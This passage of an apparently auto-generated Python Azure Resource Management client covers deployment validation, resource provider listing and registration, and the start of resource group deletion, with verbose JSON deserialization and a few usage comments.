timestamp_value = properties_value.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value2 = providers_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
provider_instance.id = id_instance2
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value2 = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value2
dependencies_array = properties_value.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value = properties_value.get('templateLink', None)
if template_link_value is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value = properties_value.get('parametersLink', None)
if parameters_link_value is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
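# Usage sketch (illustrative only, not part of the generated client):
# paging through all deployments by chaining list() and list_next().
# `client` is assumed to be a configured ResourceManagementClient and
# `client.deployments` an instance of this operations class.
#
#     result = client.deployments.list('my-group', None)
#     all_deployments = list(result.deployments)
#     while result.next_link:
#         result = client.deployments.list_next(result.next_link)
#         all_deployments.extend(result.deployments)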
def validate(self, resource_group_name, deployment_name, parameters):
"""
Validate a deployment template.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
parameters (Deployment): Deployment to validate.
Returns:
DeploymentValidateResponse: Information from validate template
deployment response.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.properties is not None:
if parameters.properties.parameters_link is not None:
if parameters.properties.parameters_link.uri is None:
raise ValueError('parameters.properties.parameters_link.uri cannot be None.')
if parameters.properties.template_link is not None:
if parameters.properties.template_link.uri is None:
raise ValueError('parameters.properties.template_link.uri cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/validate'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' from the end of base_url and the beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
deployment_value = {}
request_doc = deployment_value
if parameters.properties is not None:
properties_value = {}
deployment_value['properties'] = properties_value
if parameters.properties.template is not None:
properties_value['template'] = json.loads(parameters.properties.template)
if parameters.properties.template_link is not None:
template_link_value = {}
properties_value['templateLink'] = template_link_value
template_link_value['uri'] = parameters.properties.template_link.uri
if parameters.properties.template_link.content_version is not None:
template_link_value['contentVersion'] = parameters.properties.template_link.content_version
if parameters.properties.parameters is not None:
properties_value['parameters'] = json.loads(parameters.properties.parameters)
if parameters.properties.parameters_link is not None:
parameters_link_value = {}
properties_value['parametersLink'] = parameters_link_value
parameters_link_value['uri'] = parameters.properties.parameters_link.uri
if parameters.properties.parameters_link.content_version is not None:
parameters_link_value['contentVersion'] = parameters.properties.parameters_link.content_version
if parameters.properties.mode is not None:
properties_value['mode'] = str(parameters.properties.mode)
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 400:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 400:
response_content = body
result = DeploymentValidateResponse()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
error_value = response_doc.get('error', None)
if error_value is not None:
error_instance = ResourceManagementErrorWithDetails(details=[])
result.error = error_instance
details_array = error_value.get('details', None)
if details_array is not None:
for details_value in details_array:
resource_management_error_instance = ResourceManagementError()
error_instance.details.append(resource_management_error_instance)
code_value = details_value.get('code', None)
if code_value is not None:
code_instance = code_value
resource_management_error_instance.code = code_instance
message_value = details_value.get('message', None)
if message_value is not None:
message_instance = message_value
resource_management_error_instance.message = message_instance
target_value = details_value.get('target', None)
if target_value is not None:
target_instance = target_value
resource_management_error_instance.target = target_instance
code_value2 = error_value.get('code', None)
if code_value2 is not None:
code_instance2 = code_value2
error_instance.code = code_instance2
message_value2 = error_value.get('message', None)
if message_value2 is not None:
message_instance2 = message_value2
error_instance.message = message_instance2
target_value2 = error_value.get('target', None)
if target_value2 is not None:
target_instance2 = target_value2
error_instance.target = target_instance2
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
result.properties = properties_instance
provisioning_state_value = properties_value2.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value2.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value2.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value2.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value2.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value = providers_value.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value3 = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value3
dependencies_array = properties_value2.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value2 = depends_on_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
basic_dependency_instance.id = id_instance2
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value3 = dependencies_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
dependency_instance.id = id_instance3
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value2.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value2 = properties_value2.get('templateLink', None)
if template_link_value2 is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value2.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value2.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value2.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value2 = properties_value2.get('parametersLink', None)
if parameters_link_value2 is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value2.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value2.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value2.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 200:
result.is_valid = True
return result
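# Usage sketch (illustrative only; `client`, the Deployment instance
# `deployment`, and the group/deployment names are assumptions, not
# defined in this file). validate() returns a DeploymentValidateResponse
# whose is_valid flag is set only when the service answers 200:
#
#     validation = client.deployments.validate('my-group', 'my-deployment', deployment)
#     if not validation.is_valid:
#         error = validation.error
#         print(error.code, error.message)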
class ProviderOperations(object):
"""
Operations for managing providers.
__NOTE__: An instance of this class is automatically created for an
instance of the ResourceManagementClient.
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the underlying ResourceManagementClient.
"""
return self._client
def get(self, resource_provider_namespace):
"""
Gets a resource provider.
Args:
resource_provider_namespace (string): Namespace of the resource
provider.
Returns:
ProviderGetResult: Resource provider information.
"""
# Validate
if resource_provider_namespace is None:
raise ValueError('resource_provider_namespace cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers/'
url = url + quote(resource_provider_namespace)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' from the end of base_url and the beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
provider_instance = Provider(resource_types=[])
result.provider = provider_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = response_doc.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = response_doc.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = response_doc.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, parameters):
"""
Gets a list of resource providers.
Args:
parameters (ProviderListParameters): Query parameters. If None is
passed, all resource providers are returned.
Returns:
ProviderListResult: List of resource providers.
"""
# Validate
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers'
query_parameters = []
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' from the end of base_url and the beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderListResult(providers=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
provider_instance = Provider(resource_types=[])
result.providers.append(provider_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = value_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = value_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = value_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
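# Usage sketch (illustrative only; `client` and the
# ProviderListParameters(top=...) constructor are assumptions). The $top
# query parameter limits how many providers a single page returns:
#
#     result = client.providers.list(ProviderListParameters(top=10))
#     for provider in result.providers:
#         print(provider.namespace, provider.registration_state)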
def list_next(self, next_link):
"""
Get a list of resource providers.
Args:
next_link (string): NextLink from the previous successful call to the
List operation.
Returns:
ProviderListResult: List of resource providers.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderListResult(providers=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
provider_instance = Provider(resource_types=[])
result.providers.append(provider_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = value_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = value_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = value_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def register(self, resource_provider_namespace):
"""
Registers provider to be used with a subscription.
Args:
resource_provider_namespace (string): Namespace of the resource
provider.
Returns:
ProviderRegistionResult: Resource provider registration information.
"""
# Validate
if resource_provider_namespace is None:
raise ValueError('resource_provider_namespace cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers/'
url = url + quote(resource_provider_namespace)
url = url + '/register'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' from the end of base_url and the beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderRegistionResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
provider_instance = Provider(resource_types=[])
result.provider = provider_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = response_doc.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = response_doc.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = response_doc.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for properties_key in properties_sequence_element:
properties_value = properties_sequence_element[properties_key]
provider_resource_type_instance.properties[properties_key] = properties_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
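# The register flow above hand-builds the request URL and then normalizes
# slashes before sending. A minimal standalone sketch of that join logic
# (join_url is a hypothetical helper, not part of this client):

```python
def join_url(base_url, path, query_parameters=()):
    """Join a base URL and a path, trimming redundant slashes.

    Mirrors the inline URL assembly used by the operations in this module.
    """
    # Trim '/' from the end of base_url and the beginning of path.
    if base_url.endswith('/'):
        base_url = base_url[:-1]
    if path.startswith('/'):
        path = path[1:]
    url = base_url + '/' + path
    if query_parameters:
        url = url + '?' + '&'.join(query_parameters)
    # Spaces are the only characters escaped here, as in the code above.
    return url.replace(' ', '%20')
```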
def unregister(self, resource_provider_namespace):
"""
Unregisters a provider from a subscription.
Args:
resource_provider_namespace (string): Namespace of the resource
provider.
Returns:
ProviderUnregistionResult: Resource provider unregistration information.
"""
# Validate
if resource_provider_namespace is None:
raise ValueError('resource_provider_namespace cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers/'
url = url + quote(resource_provider_namespace)
url = url + '/unregister'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderUnregistionResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
provider_instance = Provider(resource_types=[])
result.provider = provider_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = response_doc.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = response_doc.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = response_doc.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for properties_key in properties_sequence_element:
properties_value = properties_sequence_element[properties_key]
provider_resource_type_instance.properties[properties_key] = properties_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
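# register() and unregister() deserialize the provider document field by
# field. A compact dict-based equivalent of that mapping (a sketch, not the
# SDK's model types):

```python
def parse_provider(doc):
    """Map a raw provider JSON document to a plain dict (sketch only)."""
    provider = {
        'id': doc.get('id'),
        'namespace': doc.get('namespace'),
        'registration_state': doc.get('registrationState'),
        'resource_types': [],
    }
    for rt in doc.get('resourceTypes') or []:
        provider['resource_types'].append({
            'name': rt.get('resourceType'),
            'locations': list(rt.get('locations') or []),
            'api_versions': list(rt.get('apiVersions') or []),
            'properties': dict(rt.get('properties') or {}),
        })
    return provider
```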
class ResourceGroupOperations(object):
"""
Operations for managing resource groups.
Note: An instance of this class is automatically created for an
instance of ResourceManagementClient.
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def begin_deleting(self, resource_group_name):
"""
Begins deleting a resource group. To determine whether the operation
has finished processing the request, call
get_long_running_operation_status.
Args:
resource_group_name (string): The name of the resource group to be
deleted. The name is case insensitive.
Returns:
LongRunningOperationResponse: A standard service response for long
running operations.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'DELETE'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
